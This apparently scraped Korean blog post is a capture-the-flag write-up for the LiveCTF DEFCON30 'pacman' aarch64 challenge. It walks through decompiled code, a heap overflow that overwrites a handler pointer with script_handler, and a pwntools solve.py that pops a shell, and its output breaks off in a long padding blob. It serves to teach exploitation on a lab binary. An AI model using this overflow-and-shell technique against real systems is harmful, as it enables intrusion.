https:\/\/github.com\/Live-CTF\/LiveCTF-DEFCON30\/releases\/tag\/defcon30<\/a><\/p>\n\n\n\n 4. IDA Pro\uc5d0\uc11c \ubd84\uc11d\uc2dc 0, 1, 2 \uc774\uc678\uc758 \ub2e4\ub978 \uba54\ub274 \uc785\ub825\uc2dc 0 \u2192 \uba3c\uc800 \u201c? \u201c \ubb38\uad6c\ub97c \ub744\uc6b0\uba74\uc11c \uba54\ub274 0, 1, 2 \uc911\uc5d0 \ubb50 \uc120\ud0dd\ud560\uc9c0 \ubb3c\uc74c.<\/p>\n\n\n\n 0\uc740 Data\ub97c A 8\uac1c, Path\ub97c B 8\uac1c\ub85c \ud588\uc744\uc2dc,<\/p>\n\n\n\n \uc704\uc640 \uac19\uc774 Package blob\uc774 \ucd9c\ub825\ub41c\ub2e4.<\/p>\n\n\n\n 1\uc740 \uc5ec\uae30\uc11c 2\ub294 \ub9cc\uc57d \uc785\ub825\ub41c \uac01 \ud0c0\uc785\ub4e4\uc740 build_package \ub0b4\uc5d0 \uc4f0\uc778 type\uc5d0 \ub530\ub77c \uc791\ub3d9\ud55c\ub2e4\uace0 \ubcf4\uba74 \ub428.<\/p>\n\n\n\n \ud658\uacbd\ubcc0\uc218\uac00 \uc9c0\uc815\uc548\ub418\uc788\uace0, \u201c\/\u201d \ud544\ud130\ub9c1 \ucc98\ub9ac\uac00 \ub418\uc788\uae30\uc5d0 \uc774\ud6c4\uc5d0 \ucd9c\ucc98 https:\/\/github.com\/Live-CTF\/LiveCTF-DEFCON30\/releases\/tag\/defcon30 checksec \uc900\ube44 4. IDA Pro\uc5d0\uc11c \ubd84\uc11d\uc2dc \u201cPACDZA X0\u201d \uc640 \uac19\uc774 PAC\uac00 \uc874\uc7ac\ud558\ubbc0\ub85c,Hex-Rays Decompiler Options \u2192 Analysis Options 2\uc5d0\uc11c \u201cShow ARMv8.3 PAC instructions\u201d \uccb4\ud06c \ud65c\uc131\ud654. Decompiled-src \/ Analysis main 0, 1, 2 \uc774\uc678\uc758 \ub2e4\ub978 \uba54\ub274 \uc785\ub825\uc2dc “Invalid choice” \ubb38\uad6c \ub744\uc6b0\uba74\uc11c \ub2e4\uc2dc \uba54\ub274 \uc785\ub825\ubc1b\uc74c. 0 \u2192 exit(0) 1 \u2192 build_package() 2 \u2192 install_package() build_package \uba3c\uc800… \ub354 \ubcf4\uae30 »[LiveCTF-DEFCON30] pacman<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"neve_meta_sidebar":"","neve_meta_container":"","neve_meta_enable_content_width":"","neve_meta_content_width":0,"neve_meta_title_alignment":"","neve_meta_author_avatar":"","neve_post_elements_order":"","neve_meta_disable_header":"","neve_meta_disable_footer":"","neve_meta_disable_title":"","footnotes":""},"categories":[19],"tags":[25],"class_list":["post-3400","post","type-post","status-publish","format-standard","hentry","category-ctf-private","tag-pwnable"],"_links":{"self":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3400","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3400"}],"version-history":[{"count":1,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3400\/revisions"}],"predecessor-version":[{"id":3401,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3400\/revisions\/3401"}],"wp:attachment":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3400"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3400"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3400"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}checksec<\/h3>\n\n\n\n
[*] '\/home\/ubuntu\/LiveCTF30\/handout\/pacman'\n Arch: aarch64-64-little\n RELRO: Partial RELRO\n Stack: Canary found\n NX: NX enabled\n PIE: No PIE (0x400000)\n Stripped: No\n Debuginfo: Yes\n<\/pre>\n\n\n\n
\uc900\ube44<\/h3>\n\n\n\n
\n
#!\/bin\/sh\n\n# Requires (for ubuntu 22.04): qemu-user libc6-arm64-cross\n\nBIN=${1:-.\/pacman}\nexec qemu-aarch64 -cpu max -L .\/ ${BIN}<\/pre>\n\n\n\n\u201cPACDZA X0\u201d<\/code> \uc640 \uac19\uc774 PAC\uac00 \uc874\uc7ac\ud558\ubbc0\ub85c,
Hex-Rays Decompiler Options \u2192 Analysis Options 2\uc5d0\uc11c \u201cShow ARMv8.3 PAC instructions\u201d \uccb4\ud06c \ud65c\uc131\ud654.<\/p>\n\n\n\n<\/ol>\n\n\n\n
Decompiled-src \/ Analysis<\/h2>\n\n\n\n
main<\/h3>\n\n\n\n
\"Invalid choice\"<\/code> \ubb38\uad6c \ub744\uc6b0\uba74\uc11c \ub2e4\uc2dc \uba54\ub274 \uc785\ub825\ubc1b\uc74c.<\/p>\n\n\n\nexit(0)<\/code>
1 \u2192 build_package()<\/code>
2 \u2192 install_package()<\/code><\/p>\n\n\n\nint __fastcall __noreturn main(int argc, const char **argv, const char **envp)\n{\n char choice[8]; \/\/ [xsp+10h] [xbp+10h] BYREF\n\n init();\n puts(\"This is PACman v0.1\");\n puts(byte_401E00);\n while ( 1 )\n {\n puts(\"What do you want to do?\");\n puts(byte_401E00);\n puts(\"0) Exit\");\n puts(\"1) Build package\");\n puts(\"2) Install package\");\n printf(\"? \");\n strcpy(choice, \"0\");\n read(0, choice, 2u);\n if ( choice[0] == '2' )\n {\n install_package();\n }\n else\n {\n if ( (unsigned __int8)choice[0] <= (unsigned int)'2' )\n {\n if ( choice[0] == '1' )\n {\n build_package();\n goto LABEL_12;\n }\n if ( (unsigned __int8)choice[0] <= (unsigned int)'1' && (choice[0] == '\\n' || choice[0] == '0') )\n exit(0);\n }\n puts(\"Invalid choice\");\n }\nLABEL_12:\n puts(byte_401E00);\n }\n}<\/pre>\n\n\n\nbuild_package<\/h3>\n\n\n\n
void __cdecl build_package()\n{\n object_type v0; \/\/ w0\n bool end; \/\/ [xsp+17h] [xbp+17h]\n char *type; \/\/ [xsp+18h] [xbp+18h] BYREF\n char *path; \/\/ [xsp+20h] [xbp+20h] BYREF\n char *data; \/\/ [xsp+28h] [xbp+28h] BYREF\n package_object *head; \/\/ [xsp+30h] [xbp+30h]\n package_object *cur; \/\/ [xsp+38h] [xbp+38h]\n package_object *o; \/\/ [xsp+40h] [xbp+40h]\n size_t type_len; \/\/ [xsp+48h] [xbp+48h]\n size_t data_len_0; \/\/ [xsp+50h] [xbp+50h]\n void *p_0; \/\/ [xsp+58h] [xbp+58h]\n size_t path_len; \/\/ [xsp+60h] [xbp+60h]\n size_t data_len; \/\/ [xsp+68h] [xbp+68h]\n void *p; \/\/ [xsp+70h] [xbp+70h]\n void *p_1; \/\/ [xsp+78h] [xbp+78h]\n void *p_2; \/\/ [xsp+80h] [xbp+80h]\n\n head = 0;\n cur = 0;\n end = 0;\n while ( !end )\n {\n puts(\"Object type:\");\n puts(\"0 = EOF\");\n puts(\"1 = File\");\n puts(\"2 = Run Script\");\n o = (package_object *)calloc(1u, 0x1030u);\n if ( !o )\n err(1, \"malloc(package_object)\");\n type = 0;\n type_len = getinput(\"? \", &type);\n if ( !type || strlen(type) != 1 )\n fprintf(stderr, \"Invalid object type input %s\\n\", type);\n o->type = (unsigned __int8)*type;\n v0 = o->type;\n if ( v0 == object_type::Script )\n {\n data = 0;\n data_len_0 = getinput(\"Script? \", &data);\n o->handler = (void (*)(void *))script_handler;\n o->file.data = data;\n p_0 = o->file.data;\n p_0 = ptrauth_sign_unauthenticated(p_0, ptrauth_key_asda, 0);\n o->file.data = (char *)p_0;\n }\n else\n {\n if ( (unsigned int)v0 > object_type::Script )\n goto LABEL_15;\n if ( v0 == object_type::End )\n {\n end = 1;\n }\n else\n {\n if ( v0 != object_type::File )\n {\nLABEL_15:\n fprintf(stderr, \"Bad object type int = %d\\n\", o->type);\n exit(1);\n }\n path = 0;\n path_len = getinput(\"Path? \", &path);\n data = 0;\n data_len = getinput(\"Data? \", &data);\n o->handler = (void (*)(void *))file_handler;\n o->file.data = data;\n o->file.data_len = data_len;\n memcpy(&o->script + 2, path, path_len);\n o->file.path_len = path_len;\n p = o->file.data;\n p = ptrauth_sign_unauthenticated(p, ptrauth_key_asda, 0);\n o->file.data = (char *)p;\n }\n }\n p_1 = o->handler;\n p_1 = ptrauth_sign_unauthenticated(p_1, ptrauth_key_asda, 0);\n o->handler = (void (*)(void *))p_1;\n if ( head )\n {\n cur->next = o;\n p_2 = cur->next;\n p_2 = ptrauth_sign_unauthenticated(p_2, ptrauth_key_asda, 0);\n cur->next = (package_object *)p_2;\n }\n else\n {\n head = o;\n }\n cur = o;\n }\n printf(\"Package blob: \");\n write_package_blob(1, head);\n}<\/pre>\n\n\n\nvoid __cdecl file_handler(package_file *file)\n{\n __int64 v1; \/\/ kr00_8\n int fd; \/\/ [xsp+24h] [xbp+24h]\n\n fd = open(file->path, 0x41, 0644); \/\/ 0x41 = O_WRONLY | O_CREAT;\n if ( fd < 0 )\n err(1, \"open(file)\");\n v1 = 0;\n file->data = (char *)ptrauth_auth_data(file->data, ptrauth_key_asda, &v1);\n write(fd, file->data, file->data_len);\n close(fd);\n}<\/pre>\n\n\n\nobject_type::End<\/code>, end<\/code> \ubcc0\uc218\uac00 1\ub85c set\ub418\uc5b4 while(!end)<\/code> \ub8e8\ud504\ubb38\uc744 \ube60\uc838\ub098\uac10.<\/p>\n\n\n\nPackage blob: 10000008AAAAAAAA0000008BBBBBBBB20000008AAAAAAAA10000008AAAAAAAA0000008BBBBBBBB0<\/code><\/p>\n\n\n\n...\nif ( v0 == object_type::End )\n{\n end = 1;\n}\n...\nprintf(\"Package blob: \");\nwrite_package_blob(1, head);<\/pre>\n\n\n\nobject_type::File<\/code>, Path<\/code>\uc640 Data<\/code>\ub97c \ud568\uaed8 \uc785\ub825\ubc1b\uc744 \uc218 \uc788\uc74c.
\uc5ec\uae30\uc11c Path<\/code> \uae38\uc774\uc5d0 \ub530\ub77c memcpy<\/code>\uc5d0 \uc758\ud574 bof \ucde8\uc57d\uc810 \ubc1c\uc0dd \uac00\ub2a5.<\/p>\n\n\n\no = (package_object *)calloc(1u, 4144u);\n...\nif ( v0 != object_type::File )\n{\n fprintf(stderr, \"Bad object type int = %d\\n\", o->type);\n exit(1);\n}\npath = 0;\npath_len = getinput(\"Path? \", &path);\ndata = 0;\ndata_len = getinput(\"Data? \", &data);\no->handler = (void (*)(void *))file_handler;\no->file.data = data;\no->file.data_len = data_len;\nmemcpy(&o->script + 2, path, path_len);\no->file.path_len = path_len;\np = o->file.data;\np = ptrauth_sign_unauthenticated(p, ptrauth_key_asda, 0);\no->file.data = (char *)p;\n...<\/pre>\n\n\n\nsize_t __cdecl getinput(const char *prompt, char **buf)\n{\n size_t len; \/\/ [xsp+20h] [xbp+20h] BYREF\n\n printf(\"%s\", prompt);\n len = 0;\n len = getline(buf, &len, stdin);\n if ( (*buf)[len - 1] == 10 )\n (*buf)[--len] = 0;\n return len;\n}<\/pre>\n\n\n\ncalloc(1u, 4144u)<\/code>\uc5d0 \uc758\ud574 \ud560\ub2f9\ub41c \uc8fc\uc18c = 0x4142A0<\/code>.<\/p>\n\n\n\nPath? AAAAAAAA<\/code>Data? BBBBBBBB<\/code> \ub85c \uc785\ub825\ud558\uace0 memcpy(&o->script + 2, path, path_len);<\/code>\ud560 \ub54c\ub97c \uc0b4\ud3b4\ubcf4\uba74,x0<\/code> \ub808\uc9c0\uc2a4\ud130\ub294 0x4142C0<\/code> \uc8fc\uc18c\ub97c \uac00\ub9ac\ud0a8\ub2e4, \uc989 \ud560\ub2f9\ub41c \uc8fc\uc18c + 0x20<\/code>\uc774\ub2e4.<\/p>\n\n\n\n0x4152C8 - 0x4142C0 = 0x1008<\/code> ,0x1008<\/code>\ub9cc\ud07c \ub354\ubbf8\ub97c \ucc44\uc6cc\uc11c file_handler<\/code> \ud568\uc218\ub97c \ub36e\uc5b4\uc4f8 \uc218 \uc788\ub2e4.<\/p>\n\n\n\nMEMORY:00000000004142A0 DCQ 0 ; next\nMEMORY:00000000004142A8 DCD object_type::File ; type\nMEMORY:00000000004142AC DCB 0, 0, 0, 0\nMEMORY:00000000004142B0 DCQ aBbbbbbbb ; file.data ; \"BBBBBBBB\"\nMEMORY:00000000004142B8 DCQ 8 ; file.data_len\nMEMORY:00000000004142C0 DCB 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0; file.path\n...\nMEMORY:00000000004152B6 DCB 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0\nMEMORY:00000000004152C8 DCQ file_handler ; handler<\/pre>\n\n\n\n
object_type::Script<\/code>, Script?<\/code> \ubb38\uad6c\uc640 \ud568\uaed8 data\ub97c \uc785\ub825\ubc1b\uc74c.
\uc774\ubbf8 1\ubc88 \uba54\ub274\uc5d0\uc11c Path\uc640 Data \ud568\uaed8 \uc785\ub825\ubc1b\uae30\uc5d0, \ud544\uc694\uc5c6\uc74c.<\/p>\n\n\n\nif ( v0 == object_type::Script )\n{\n data = 0;\n data_len_0 = getinput(\"Script? \", &data);\n o->handler = (void (*)(void *))script_handler;\n o->file.data = data;\n p_0 = o->file.data;\n p_0 = ptrauth_sign_unauthenticated(p_0, ptrauth_key_asda, 0);\n o->file.data = (char *)p_0;\n}<\/pre>\n\n\n\ninstall_package<\/h3>\n\n\n\n
parse_package_blob<\/code>\ub97c \ud638\ucd9c\ud558\uc5ec \ud30c\uc2f1\ub41c type<\/code>\uc5d0 \ub530\ub77chandler<\/code>\uc5d0 \uc800\uc7a5\ub41c \ud568\uc218\uac00 \ud638\ucd9c\ub420\uc9c0 \uc548\ub420\uc9c0 \uc5ec\ubd80\ub97c \uacb0\uc815\ud55c\ub2e4.<\/p>\n\n\n\ntype<\/code>\uc774 1 \ub610\ub294 2\ub77c\uba74, handler<\/code>\uc5d0 \uc800\uc7a5\ub41c \ud568\uc218\uac00 \ud638\ucd9c\ub41c\ub2e4.<\/p>\n\n\n\nvoid __cdecl install_package()\n{\n __int64 v0; \/\/ kr00_8\n unsigned int type; \/\/ w0\n __int64 v2; \/\/ kr08_8\n package_object *cur; \/\/ [xsp+18h] [xbp+18h]\n\n for ( cur = parse_package_blob(0); cur; cur = cur->next )\n {\n v0 = 0;\n cur->handler = (void (*)(void *))ptrauth_auth_data(cur->handler, ptrauth_key_asda, &v0);\n printf(\"Evaluating object of type %c...\\n\", (unsigned int)cur->type);\n type = cur->type;\n if ( type != '2' )\n {\n if ( type > '2' )\n goto LABEL_10;\n if ( type == '0' )\n exit(0);\n if ( type != '1' )\n {\nLABEL_10:\n fprintf(stderr, \"Corrupt object type int = %d\\n\", cur->type);\n exit(1);\n }\n }\n cur->handler(&cur->file);\n v2 = 0;\n cur->next = (package_object *)ptrauth_auth_data(cur->next, ptrauth_key_asda, &v2);\n }\n}<\/pre>\n\n\n\nparse_package_blob<\/h3>\n\n\n\n
blob<\/code>\uc5d0 \ub530\ub77c package_object<\/code>\ub97c \ud560\ub2f9\ud558\uace0 type<\/code>\uc5d0 \ub530\ub77c \ud30c\uc2f1\uc5ed\ud560\uc744 \ud55c\ub2e4.<\/p>\n\n\n\npackage_object *__cdecl parse_package_blob(int fd)\n{\n unsigned int type; \/\/ w0\n bool end; \/\/ [xsp+2Fh] [xbp+2Fh]\n package_object *head; \/\/ [xsp+30h] [xbp+30h]\n package_object *cur; \/\/ [xsp+38h] [xbp+38h]\n package_object *o; \/\/ [xsp+40h] [xbp+40h]\n size_t data_len_0; \/\/ [xsp+48h] [xbp+48h]\n char *data_0; \/\/ [xsp+50h] [xbp+50h]\n size_t path_len; \/\/ [xsp+68h] [xbp+68h]\n char *path; \/\/ [xsp+70h] [xbp+70h]\n size_t data_len; \/\/ [xsp+78h] [xbp+78h]\n char *data; \/\/ [xsp+80h] [xbp+80h]\n\n head = 0;\n cur = 0;\n end = 0;\n while ( !end )\n {\n o = (package_object *)calloc(1u, 4144u);\n if ( !o )\n err(1, \"malloc(package_object)\");\n read_exactly(fd, &o->type, 1u);\n printf(\"Parsing object of type %c\\n\", (unsigned int)o->type);\n type = o->type;\n if ( type == '2' )\n {\n if ( is_running_safe() )\n {\n fwrite(\"Scripts not allowed unless PACMAN_UNSAFE=1\\n\", 1u, 0x2Bu, stderr);\n exit(1);\n }\n data_len_0 = read_size_field(fd);\n data_0 = (char *)malloc(data_len_0);\n if ( !data_0 )\n err(1, \"malloc(data)\");\n read_exactly(fd, data_0, data_len_0);\n o->handler = (void (*)(void *))script_handler;\n o->handler = (void (*)(void *))ptrauth_sign_unauthenticated(o->handler, ptrauth_key_asda, 0);\n o->file.data = data_0;\n o->file.data = (char *)ptrauth_sign_unauthenticated(o->file.data, ptrauth_key_asda, 0);\n }\n else\n {\n if ( type > '2' )\n goto LABEL_23;\n if ( type == '0' )\n {\n end = 1;\n }\n else\n {\n if ( type != '1' )\n {\nLABEL_23:\n fprintf(stderr, \"Bad object type int = %d\\n\", o->type);\n exit(1);\n }\n path_len = read_size_field(fd);\n path = (char *)malloc(path_len);\n if ( !path )\n err(1, \"malloc(path)\");\n read_exactly(fd, path, path_len);\n if ( is_running_safe() && strchr(path, '\/') )\n {\n fwrite(\"Subdirectories not allowed in safe mode\\n\", 1u, 0x28u, stderr);\n exit(1);\n }\n data_len = read_size_field(fd);\n data = (char *)malloc(data_len);\n if ( !data )\n err(1, \"malloc(data)\");\n read_exactly(fd, data, data_len);\n o->handler = (void (*)(void *))file_handler;\n o->handler = (void (*)(void *))ptrauth_sign_unauthenticated(o->handler, ptrauth_key_asda, 0);\n o->file.data = data;\n o->file.data_len = data_len;\n memcpy(&o->script + 2, path, path_len);\n o->file.path_len = path_len;\n o->file.data = (char *)ptrauth_sign_unauthenticated(o->file.data, ptrauth_key_asda, 0);\n }\n }\n if ( head )\n {\n cur->next = o;\n cur->next = (package_object *)ptrauth_sign_unauthenticated(cur->next, ptrauth_key_asda, 0);\n }\n else\n {\n head = o;\n }\n cur = o;\n }\n return head;\n}<\/pre>\n\n\n\nPath<\/code>\ub97c \uc784\uc758\ub85c \uc9c0\uc815\ud574\uc11c flag\ub97c \uc77d\uc5b4\ub0bc \uc21c \uc5c6\uc744 \uac83\uc774\ub2e4..<\/p>\n\n\n\nif ( is_running_safe() && strchr(path, '\/') )\n{\n fwrite(\"Subdirectories not allowed in safe mode\\n\", 1u, 0x28u, stderr);\n exit(1);\n}<\/pre>\n\n\n\nbool __cdecl is_running_safe()\n{\n char *unsafe; \/\/ [xsp+18h] [xbp+18h]\n\n unsafe = getenv(\"PACMAN_UNSAFE\");\n return !unsafe || *unsafe == a1[0];\n}<\/pre>\n\n\n\nsolve.py<\/h3>\n\n\n\n
Path<\/code>\ub294 0x1008\ubc14\uc774\ud2b8\ub9cc\ud07c \ub354\ubbf8\ub85c \ucc44\uc6b0\uace0, script_handler<\/code> \ud568\uc218\uac00 \uc2e4\ud589\ub418\uac8c\ub054 handler<\/code>\ub97c \ub36e\uc5b4\uc4f0\uac8c\ub054 \ub9cc\ub4e0\ub2e4.Data<\/code>\ub294 \u201csh\u201d<\/code> \ubb38\uc790\uc5f4\ub85c \uc9c0\uc815\ud574\uc11c blob\ub97c \uc0dd\uc131\ud55c\ub2e4. (heap overflow)<\/p>\n\n\n\ninstall_package<\/code> \ud568\uc218\ub97c \ud1b5\ud574 \uc0dd\uc131\ub41c blob\uc744 \ub123\uac8c \ub418\uba74,
cur->handler(&cur->file); \ucf54\ub4dc\uc5d0\uc11c script_handler\uac00 \ud638\ucd9c\ub418\uba74\uc11c Data\uc778 script->script\uac00 \uc778\uc790\ub85c, system\uc774 \ud638\ucd9c\ub418\uba74\uc11c \uc258\uc744 \ub538 \uc218 \uc788\uc5c8\ub2e4.<\/p>\n\n\n\nfrom pwn import *\n# context.log_level = 'debug'\ncontext(arch='amd64', os='linux')\nwarnings.filterwarnings('ignore')\n\n# p = remote(\"127.0.0.1\", 1337)\np = process(\".\/challenge\")\ne = ELF('.\/pacman',checksec=False)\n\ns = lambda str: p.send(str)\nsl = lambda str: p.sendline(str)\nsa = lambda delims, str: p.sendafter(delims, str)\nsla = lambda delims, str: p.sendlineafter(delims, str)\nr = lambda numb=4096: p.recv(numb)\nrl = lambda: p.recvline()\nru = lambda delims: p.recvuntil(delims)\nuu32 = lambda data: u32(data.ljust(4, b\"\\x00\"))\nuu64 = lambda data: u64(data.ljust(8, b\"\\x00\"))\nli = lambda str, data: log.success(str + \"========>\" + hex(data))\n\n# build package\nsla(b'? ', b'1')\n\n# object_type::File\nsla(b'? ', b'1')\nsla(b'Path? ', b'A'*0x1008 + p64(e.symbols['script_handler']))\nsla(b'Data? ', b'sh')\n\n# object_type::End\nsla(b'? ', b'0')\n\n# get blob\nru(b'blob: ')\nblob = ru(b'\\nWhat')[:-5]\nsuccess(f\"blob: {blob}\")\n\n# install_package with blob\nsla(b'? ', b'2')\nsl(blob)\n\np.interactive()<\/pre>\n\n\n\nResult<\/h3>\n\n\n\n
ubuntu@2d0f4d9a440c:~\/LiveCTF30\/handout$ python3 solve.py\n[+] Starting local process '.\/challenge': pid 1112\n[+] blob: b'10004112AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA